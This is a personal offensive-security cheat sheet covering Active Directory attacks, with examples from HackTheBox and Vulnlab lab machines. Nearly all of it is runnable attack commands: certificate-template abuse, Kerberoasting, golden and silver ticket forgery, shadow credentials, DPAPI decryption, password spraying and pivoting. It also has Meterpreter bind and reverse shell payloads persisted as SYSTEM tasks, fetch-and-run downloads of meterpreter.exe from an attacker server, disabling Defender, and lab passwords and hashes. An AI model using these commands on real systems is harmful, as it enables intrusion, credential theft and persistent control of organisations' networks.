Destinys Ultimate Cheetsheet - August 2025 Edition

Certificate Attacks AD

Abusing ESC4 by turning it to ESC1 Vulnerable

certipy-ad template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.126.132 -template SendaiComputer

Save the output to JSON that we can add to bloodhound

certipy-ad find -u 'peter.turner'@HYBRID.VL -p "b0cwR+G4Dzl_rw" -dc-ip 10.10.155.165 -old-bloodhound 

Use Certipy instead of certipy-ad package because its updated with latest ESC Vulnerabilities

python3 -m venv certipy-venv
source certipy-venv/bin/activate
pip install certipy-ad

certipy find -username ca_svc -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -vulnerable

Requesting Vulnerable certificates from the DC

certipy-ad find -u 'levi.james'@PUPPY.HTB -p 'KingofAkron2025!' -dc-ip 10.10.11.70 -stdout -vulnerable

Requesting Vulnerable certificates from the DC using Kerberos TGT exported

certipy-ad find -u 'Rosie.Powell' -vulnerable -stdout -k -no-pass -target <FQDN>

Exploiting ESC1 (W/Hash) by requesting Administrators certificate:

certipy-ad req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.228.165" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'dc01.hybrid.vl' -key-size 4096

Exploiting ESC1 (W/Password) by requesting Administrators certificate:

certipy-ad req -u 'BANKING$' -p password -dc-ip 10.10.126.241 -ca retro-DC-CA -template RetroClients -upn administrator -target 10.10.126.241 -key-size 4096

Exploiting ESC16 :

# Step 1: Read attributes of victim account (optional)
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read

# Step 2: Update the victim account's UPN to target administrator's sAMAccountName
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69'  -upn 'administrator'  -user 'ca_svc' update

# Step 3: Request a certificate with KeyCredential, exploiting ESC16
certipy shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -account 'ca_svc' auto

# Export the credential cache for later use
export KRB5CCNAME=ca_svc.ccache

# Step 4: Request a certificate for the administrator user
certipy req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'

# Step 5: Restore the victim account's original UPN
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

# Step 6: Authenticate as administrator using the certificate
certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'

Relevant Boxes :

• Retro - Vulnlab.com
• Hybrid - Vulnlab.com
• Cicada - Vulnlab.com : Best CTF that showcase the use of attacking using Kerberos TGT when no NTLM Authentication is enabled
• Sendai - Vulnlab.com - ESC4
• Fluffy - HackTheBox.com - ESC16

Username Enumeration

lookupsid.py for SID Bruteforcing - Windows

impacket-lookupsid anonymous@10.10.66.32 -no-pass

Filter only the usernames :

impacket-lookupsid anonymous@retro2.vl -no-pass | awk -F'\\\\| ' '/SidTypeUser/ {print $3}'

SMB Enumeration

Null session enumeration shares using cme:

crackmapexec smb 10.10.66.32 -u "a" -p "" --shares

Connecting to SMB using kerberos ticket exported without credentials :

impacket-smbclient cicada.vl/Rosie.Powell@DC-JPQ225 -k -no-pass

Relevant Boxes :

• Cicada - Vulnlab.com

LDAP Enumeration

ldapsearch -H ldaps://baby.vl:636/ -x -s base -b '' "(objectClass=*)" "*" +

ldapsearch -x -H ldap://10.10.95.143 -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' |  awk '{ gsub(/ /,""); print }'

Credential Hunting

Searching for passwords in user Description fields in AD:

PS C:\> Get-DomainUser * |select samaccountname,description | ?{$_.Description -ne $null}

Searching for passwords in user Description fields in AD:

nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

Password Spraying

Windows Internal Password Spraying

We can use DomainPasswordSpray.ps1 or the Windows version of Kerbrute.

PS C:\> Invoke-DomainPasswordSpray -Password Welcome1

Static Binaries

• Nmap : https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

SharpHound

SharpHound.exe -c All --zipfilename ILFREIGHT 

Evil-WinRM

Standard Login :

evil-winrm -i <target_ip> -u <username> -p <password>

PTH Login :

evil-winrm -i <target_ip> -u <username> -H <ntlm_hash>

Meterpreter Bind Shell / Windows

msfvenom -p windows/x64/meterpreter_bind_tcp LPORT=4444 -f exe -o bind_shell_x64.exe

msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter_bind_tcp; set RHOST [target IP]; set LPORT 4444; run"

Useful when performing heavy pivoting, rather than relying on reverse shells with port forwarding. You can easily connect to a machine when the bind shell is persisted directly from Falcon.

Persist Bind Shell / Windows

schtasks /create /tn "BindShell" /tr "C:\Users\vfrank\Documents\bind_shell_x64.exe" /sc minute /mo 1 /ru SYSTEM

cleanup command :

schtasks /delete /tn "BindShell" /f

Ping Sweep

Linux :

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done 

Windows (cmd) :

for /L %i in (1, 1, 254) do @ping 172.16.5.%i -n 1 -w 100 | findstr /C:"Reply from"

Windows (powershell) :

1..100 | % {"172.16.9.$($_): $(Test-Connection -count 1 -comp 172.16.9.$($_) -quiet)"}

Pivoting

Chisel - Socks Proxy

Attacker : Falcon

./chisel server -p 8000 --reverse

Victim / JumpBox

./chisel client <falcon_ip>:8000 R:socks

Reverse Port Forwaring for RevShells

ssh -i dmz01_key -R Internal_VictimIP:443:0.0.0.0:7000 root@Pivot_Box -vN

Example :

msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.8.120 -f exe -o teams.exe LPORT=443

ssh -i dmz01_key -R 172.16.8.120:443:0.0.0.0:7000 root@10.129.203.111 -vN

┌──(destiny㉿falcon)-[/]
└─$ nc -lvp 7000

This SSH command is used for a reverse shell by forwarding a port (7000) on the pivot box to the victim’s internal IP, allowing the victim to connect back to the attacker through the forwarded port.

Ligolo-ng

Single Pivot

sudo ip tuntap add user destiny mode tun ligolo  
sudo ip link set ligolo up

sudo ./proxy -selfcert

.\agent.exe -connect <AttackerKaliIP>:11601 -ignore-cert

session
start

ifconfig

sudo ip route add <InternalNetworkIP>/<xx> dev ligolo

Example:

sudo ip route add 172.16.5.0/24 dev ligolo

Double Pivot

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

.\agent.exe -connect <PivotBoxInterfaceIP>:11601 -ignore-cert -retry

sudo ip tuntap add user destiny mode tun ligolo2  
sudo ip link set ligolo2 up

ip route add <InternalNetworkIP>/<xx> dev ligolo2

InternalNetworkIP = The IP address Range you want to access inside a Pivot

Cleanup command of the interfaces (Only use after finishing the work) :

sudo ip link set ligolo down && sudo ip tuntap del mode tun name ligolo

• Run the autoroute command and tunnel from Ligolo to start working on the tunnel through the interface.

Transfer And Execution (To Windows / SMB Writable)

proxychains4 crackmapexec smb -u vagrant -p vagrant -d sevenkingdoms.local 192.168.8.241 — put-file /home/kali/Downloads/p1v0t.exe \\Windows\\Temp\\p1v0t.exe

proxychains4 crackmapexec smb -u vagrant -p vagrant -d sevenkingdoms.local 192.168.8.241 -x “\\Windows\\Temp\\p1v0t.exe”

This method works when we have credentials to a writable smbshare and is similar to the psexec method

Transfer And Execution (Linux → Windows)

sudo python3 -m http.server 80

Invoke-WebRequest -Uri http://10.10.15.224/meterpreter.exe -OutFile C:\Windows\Temp\meterpreter.exe

Start-Process -FilePath "C:\Windows\Temp\meterpreter.exe"

Transfer using SMB Shares (Linux ←> Windows)

Start Impacket SMB Server to share the current directory.

impacket-smbserver share $(pwd) -smb2support

Mount the SMB share to drive Z: on Windows.

net use Z: \\<kali-ip>\share

Copy the file to the SMB share.

copy C:\AVTest\KasperskyRemovalTool.exe Z:\

Verify the file on Kali.

ls

Disconnect the SMB share after transfer.

net use Z: /delete

File Transfer Using Certutil.exe

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

File Transfer Using RDP and PTH Attack

Login with Drive Mounted :

xfreerdp /v:10.129.43.33 /u:username /p:'password' /drive:/opt/tools

Pass-The-Hash :

xfreerdp /v:10.129.43.33 /u:username /pth:'password' /drive:/opt/tools

Kerberoasting - Rubeus.exe

Rubeus.exe kerberoast /spn:MSSQLSvc/SQL01.inlanefreight.local:1433 /format:hashcat /nowrap

MSSQL

Enable XP cmdshell

Method 1 (impacket-mssqlclient):

enable_xp_cmdshell

Method 2 :

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

RDP

Allow Remote Desktop Connections: Run the following command:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable Restricted Admin Mode for RDP:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

xfreerdp :

xfreerdp /v:10.129.32.115 /u:htb-student /p:'HTB_@cademy_stdnt!' -cert:ignore /drive:home,"/home/destiny/tools-backup"

Abusing Bloodhound Findings

WriteOwner (PowerView)

Changed the ownership of the ca_svc account to the user ryan.

Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity 'ryan'

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set owner $TargetObject $ControlledPrincipal

Granted full control permissions (All rights) to ryan over the ca_svc account.

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan"

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" genericAll $TargetObject $ControlledPrincipal

Changed the password of the ca_svc account to 'Password9999'.

$NewPassword = ConvertTo-SecureString 'Password9999' -AsPlainText -Force  

Set-DomainUserPassword -Identity 'ca_svc' -AccountPassword $NewPassword

Relevant Boxes :

• Haze - HackTheBox.com

ForceChangePassword

PS C:>Import-Module .\PowerView.ps1
PS C:> Set-DomainUserPassword -Identity <USERNAME> -AccountPassword (ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force ) -Verbosex

Example :

PS C:>Import-Module .\PowerView.ps1
PS C:> Set-DomainUserPassword -Identity ssmalls -AccountPassword (ConvertTo-SecureString 'Str0ngpass86!' -AsPlainText -Force ) -Verbosex

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"

Using a TGT when NTLM Authentication is disabled

bloodyAD -d mirage.htb --host dc01.mirage.htb -k ccache=mark.bbond.ccache -v DEBUG set password javier.mmarshall 'Password123##'

GenericWrite

Set-DomainObject to set a fake SPN on the target account.

PS C:\> Set-DomainObject -credential $Cred -Identity ttimmons -SET @{serviceprincipalname='acmetesting/LEGIT'} -Verbose

Perform a targeted Keberoasting attack.

destinyfkr@htb[/htb]$ GetUserSPNs.py -dc-ip 172.16.8.3 INLANEFREIGHT.LOCAL/mssqladm -request-user ttimmons

Crack the Hash using Hashcat .

destinyfkr@htb[/htb]$ hashcat -m 13100 ttimmons_tgs /usr/share/wordlists/rockyou.txt

Same Attack using a Linux Host with targetedKerberoast.py

python3 targetedKerberoast.py -v -d 'DELEGATE.VL' -u 'A.Briggs' -p 'Pass' --request-user 'N.THOMPSON' --dc-ip 10.10.97.100

Refer this Article

Relevant Boxes :

• Delegate - Vulnlab.com
• Administrator - HackTheBox.com

GenericAll

Had the ability to add the user to the relevant group (Windows):

PS C:\DotNetNuke\Portals\0> $group = Convert-NameToSid "Server Admins"
PS C:\DotNetNuke\Portals\0> Add-DomainGroupMember -Identity $group -Members 'ttimmons' -verbose

Had the ability to add the user to the relevant group (Linux):

net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

ReadGMSAPassword

netexec ldap 10.10.145.117  -u 'NODERED$' -p '' --gmsa

Relevant Boxes :

• Tengu - Vulnlab.com

WriteDacl

Changing the password of the user GPOADM using PowerView :

add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"

$cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

set-domainuserpassword gpoadm -accountpassword $cred

Relevant Boxes :

• Baby2 - Vulnlab.com

AddAllowedToAct (When MachineQuota = 0)

Relevant Boxes :

• Phantom - Vulnlab.com

Activating Disabled Accounts By Abusing GenericAll

(ADAM.SILVER User account is Disabled)

Save the below content to a file named enable.ldif

dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 512

Use ldapmodify and enable the disabled user account by abusing GenericAll

ldapmodify -x -H ldap://10.129.62.170 -D 'ant.edwards@puppy.htb' -w 'Antman2025!' -f enable.ldif

Relevant Boxes :

• Puppy - HackTheBox.com

AddKeyCredentialLink

Shadow Credentials abuse using Certipy

certipy shadow auto -username 'Haze-IT-Backup$@haze.htb' -hashes 723fd747a7523dbebfc5b1d3d759ffbf -account edward.martin -target dc01.haze.htb -ns 10.10.11.61

Relevant Boxes :

• Haze - HackTheBox.com

Creating PSCredential object to run commands without RDP

Creating a PSCredential object to be able to run commands as a user without having to RDP :

PS C:\> $SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword)

Example :

PS C:\> $SecPassword = ConvertTo-SecureString 'DBAilfreight1!' -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\mssqladm', $SecPassword)

ASREP-Roasting

Impacket :

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users 

Impacket but without any userfiles:

impacket-GetNPUsers -dc-ip 10.10.10.161 -request 'htb.local/' -format hashcat

Kerberoasting

Listing SPN Accounts with GetUserSPNs.py

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

Requesting all TGS Tickets

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request 

Requesting a Single TGS ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Bloodhound-python / RustHound-CE

sudo bloodhound-python -u 'bsmith' -p '<REDACTED>' -d inlanefreight.local -ns 10.10.101.57 -c All --zip

Make sure to run dnschef with the ns as ‘127.0.0.1’ if server ip as the ns didn’t work.

rusthound-ce --domain haze.htb -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24 -c All --zip

NFS Shares

List NFS Shares

showmount -e 10.10.173.102
.
/opt/share *

Mount NFS Share

sudo mount -t nfs -o vers=3,nolock 10.10.173.102:/opt/share /mnt/new_back

Unmount the specific NFS share.

umount ./target-NFS

DNS

NS request to the specific nameserver.

dig ns <domain.tld> @<nameserver>

ANY request to the specific nameserver.

dig any <domain.tld> @<nameserver>

AXFR request to the specific nameserver.

dig axfr <domain.tld> @<nameserver>

Subdomain brute forcing.

dnsenum --dnsserver <nameserver> --enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list <domain.tld>

LDAP

Enumerating the password policy in a target Windows domain:

ldapsearch -H 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

Discovering users in a target Windows domain:

ldapsearch -x -H ldap://10.10.95.143 -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' |  awk '{ gsub(/ /,""); print }'

Using the Python tool windapsearch.py to discover users in a target Windows domain:

./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

*Enumerating Objects *

./windapsearch.py --dc-ip 10.10.10.161 -d htb.local --custom="objectClass=*" | tee objects.txt && awk 'NF{printf "%s ", $0; next}1' objects.txt > temp.txt && mv temp.txt objects.txt

Relevant Boxes:

• Forest - HackTheBox.com

Local File Inclusion (LFI)

Windows

?lfi=C:/WINDOWS/System32/drivers/etc/hosts

Windows Powershell

Adds the user destiny with the password password to the domain.

net user destiny password /add /domain

Adds the user destiny to the “Exchange Windows Permissions” group.

net group "Exchange Windows Permissions" /add destiny

Lists the members of the “Exchange Windows Permissions” group.

net groups "Exchange Windows Permissions"

Disable Windows Defender

Set-MpPreference -DisableRealtimeMonitoring $true

Kerberos Attacks

Silver Tickets

In order to perform a silver ticket attack we require the following:

• Domain SID
• User NTLM hash (convert the plaintext password to NTLM using a browser-based tool when you have plaintext credentials)
• User SPN (User we currently have access to)

Get the Domain SID from impacket’s lookupsid:

impacket-lookupsid breach.vl/svc_mssql:'Trustno1'@breach.vl

Fetch the silver ticket for the user you need (Example below : Administrator)

impacket-ticketer -nthash '69596C7AA1E8DAEE17F8E78870E25A5C' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain breach.vl -spn 'MSSQLSvc/breach.vl:1433' -user-id 500 Administrator

Export the saved ticket for linux host based attacks

export KRB5CCNAME=Administrator.ccache

Forge a golden ticket for the tony.ward user to access the lusdc.lustrous.vl host via HTTP using Mimikatz.

kerberos::golden /domain:lustrous.vl /sid:S-1-5-21-2355092754-1584501958-1513963426 /target:lusdc.lustrous.vl /service:HTTP /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /user:tony.ward /id:1114 /target:lusdc.lustrous.vl /ptt

Relevant Boxes :

• Breach - Vulnlab.com
• Lustrous - Vulnlab.com

URL File Attack

• ntlm_theft that can generate multiple types of NTLMv2 hash theft files.

Usage example :

python3 ntlm_theft.py -g all -s <kali ip> -f Important

Relevant Boxes :

• Breach - Vulnlab.com

Password Spray

Kerbrute :

kerbrute passwordspray -d cicada.vl --dc 10.10.110.102 users.txt Cicada123

Crackmapexec when NTLM is disabled :

crackmapexec smb DC-JPQ225 -u 'Rosie.Powell' -p 'Cicada123' -d cicada.vl -k

Relevant Boxes :

• Cicada - Vulnlab.com

Connecting to ftp :

lftp ftp://anonymous:anonymous@bruno.vl     

Tree view directories + files :

lftp anonymous@bruno.vl:~> find

Download all folders + files to local machine

lftp anonymous@bruno.vl:~> mirror -c -e -n .

Mimikatz

• ntlm_theft that can generate multiple types of NTLMv2 hash theft files.

Usage example :

python3 ntlm_theft.py -g all -s <kali ip> -f Important

Relevant Boxes :

• Breach - Vulnlab.com

smbpasswd

smbpasswd -r 10.10.95.143 -U Caroline.Robinson

impacket-smbpasswd sendai.vl/Elliot.Yates@dc.sendai.vl -newpass 'Password@123'

Relevant Boxes :

• Baby - Vulnlab.com
• Sendai - Vulnlab.com

Windows Privilege Escalation

PrivescCheck.ps1

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Relevant Boxes :

• Sendai - Vulnlab.com

SeEnableDelegationPrivilage

Relevant Boxes :

• Delegate - Vulnlab.com

LAPS Password

Retrieve clear text password of local administrator on host :

Get-LapsADPassword -Identity SRV -AsPlainText

Using pyLAPS to perform the same attack from a linux host :

python3 pyLAPS.py --action get --dc-ip 10.10.233.149 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw'

Relevant Boxes :

• Reflection - Vulnlab.com
• Tea - Vulnlab.com

CrackMapExec / NetExec

specify the $IP before any arg i.e cme ldap 10.10.11.174 -u admin -p admin specify a range of IPs with 192.168.1.1-23

smb

• Basic enumeration

crackmapexec smb

• Authentication

crackmapexec smb -u '<USER>' -p '<PASS> $IP -H <HASH>' 

• Use Kerberos auth (export the ccahe file as KRB5CCNAME)

crackmapexec smb -k $IP

• Dump password policy

crackmapexec smb --pass-pol	$IP

• List sharess

crackmapexec smb --shares $IP

Get the uers in the domain to a list using crackmapexec:

crackmapexec smb 172.16.7.3 -u ‘AB920’ -p ‘weasal’ --users >> users.txt

Filtered out only the usernames only to a list:

awk -F'\\\\' '{split($1, domain, "."); print tolower($2)"@"tolower(domain[1])"."tolower(domain[2])}' users.txt > new_users.txt && grep -oP '^\w+' new_users.txt > clean_users.txt

• Bruteforce RIDs to find possible users

crackmapexec smb dev.local -u 'user' -p '' --rid-brute 

• See if the users have username as the password

crackmapexec smb dev.local -u userlist -p userlist --no-bruteforce --continue-on-success

• Using netexec spider_plus module to enumerate bulk SMB shares

netexec smb 10.10.103.3 -u 'null' -p '' -M spider_plus

ldap

• List the modules you have

crackmapexec ldap -L

• Get the MachineAccountQuota - max number of machine a user can create.

crackmapexec ldap -u user -p pass -M maq

• Check for Active Directory Certificate Service

crackmapexec ldap -u user -p pass -M adcs

Check for ADCS running from the web server, go to http://url/cert If you have adcs running use certipy to exploit

• Check out trusts

crackmapexec ldap -u user -p pass -M enum_trusts

Abusing WSUS To Become Domain Admin

cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\Administrator\Documents\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \" net user destiny Password@123 /add \"" /title:"Up  
dating"'

Add this to the local administrators group on the DC

cmd.exe /c 'SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \"net localgroup administrators destiny /add \"" /title:"Updating"'

Approve the update

Relevant Boxes :

• Tea - Vulnlab.com

CrackMapExec’s gpp Modules

crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_password

Decrypt DPAPI Credentials

Save the relevant files to the local vm :

Step 1: Decrypt the MasterKey using the user’s SID and known password:

impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'

This gave us the DPAPI decryption key.

Step 2: Use the key to decrypt the credential blob:

impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

This revealed the stored credentials decrypted.

Relevant Boxes :

• Puppy - HackTheBox.com

Injecting Shadow Credentials

Exploiting Shadow Credentials. This technique allows abuse of the msDS-KeyCredentialLink attribute to authenticate as a user using forged certificates.

We used pywhisker to inject Shadow Credentials into the winrm_svc account. This was done from a Unix system as shown below:

pywhisker -u 'p.agila' -p 'prometheusx-303' -d "fluffy.htb" -t "winrm_svc" --dc-ip 10.10.11.69 -a add --filename winrm_svc --export PEM

After injecting the Shadow Credentials, we used PKINITtools to request a TGT for the winrm_svc user using the generated certificate and private key:

python3 ~/shared/tools-backup/PKINITtools/gettgtpkinit.py -cert-pem winrm_svc_cert.pem -key-pem winrm_svc_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache

We then exported the Kerberos ticket for the current session:

┌──(destiny㉿falcon)-[~/…/HTB/Machines/fluffy/winrm_svc]
└─$ export KRB5CCNAME=winrm_svc.ccache 

Finally, we extracted the NT hash of the winrm_svc account using getnthash.py:

python3 ~/shared/tools-backup/PKINITtools/getnthash.py -key d915fcc021b8d07b2c3c753dd5fe88ad9ff62013307b522c79f79b9ceac9d557 fluffy.htb/winrm_svc

Relevant Boxes :

• Fluffy - HackTheBox.com

FFUF

Vhost Fuzzing:

ffuf -w /usr/share/wordlists/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb'

RID Bruteforce

Saving Domain users to a file:

netexec smb haze.htb -u paul.taylor -p 'password' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 | tee domain_users

Relevant Boxes :

• Haze - HackTheBox.com

Generating KRB5 Config - NXC

┌──(destinyoo㉿dragon)-[~/shared/HTB/Machines/Haze]
└─$ nxc smb haze.htb -u 'Haze-IT-Backup$' -H 723fd747a7523dbebfc5b1d3d759ffbf --generate-krb5-file haze.krb
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\Haze-IT-Backup$:723fd747a7523dbebfc5b1d3d759ffbf 

┌──(destinyoo㉿dragon)-[~/shared/HTB/Machines/Haze]
└─$ cat haze.krb  

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = HAZE.HTB

[realms]
    HAZE.HTB = {
        kdc = dc01.haze.htb
        admin_server = dc01.haze.htb
        default_domain = haze.htb
    }

[domain_realm]
    .haze.htb = HAZE.HTB
    haze.htb = HAZE.HTB

┌──(destinyoo㉿dragon)-[~/shared/HTB/Machines/Haze]
└─$ sudo cp haze.krb /etc/krb5.conf

TimeRoasting

https://github.com/SecuraBV/Timeroast

┌──(destinyoo㉿dragon)-[~/shared/tools-backup/Timeroast]
└─$ python3 timeroast.py 10.10.11.75 -o ~/shared/HTB/Machines/RustyKey/rustykey.hashes

┌──(destinyoo㉿dragon)-[~/shared/tools-backup/Timeroast/extra-scripts]
└─$ python3 timecrack.py ~/shared/HTB/Machines/RustyKey/rustykey.hashes /usr/share/wordlists/rockyou.txt
[*] Starting password cracking...

Cracking:  74%|█████████████▍    | 10665253/14344392 [06:03<02:04, 29615.66pw/s][+] Cracked RID 1125 password: Rusty88!
Cracking: 100%|██████████████████| 14344392/14344392 [08:21<00:00, 28589.92pw/s]

[*] Cracking complete: 1 password(s) recovered.

Relevant Boxes :

• RustyKey - HackTheBox.com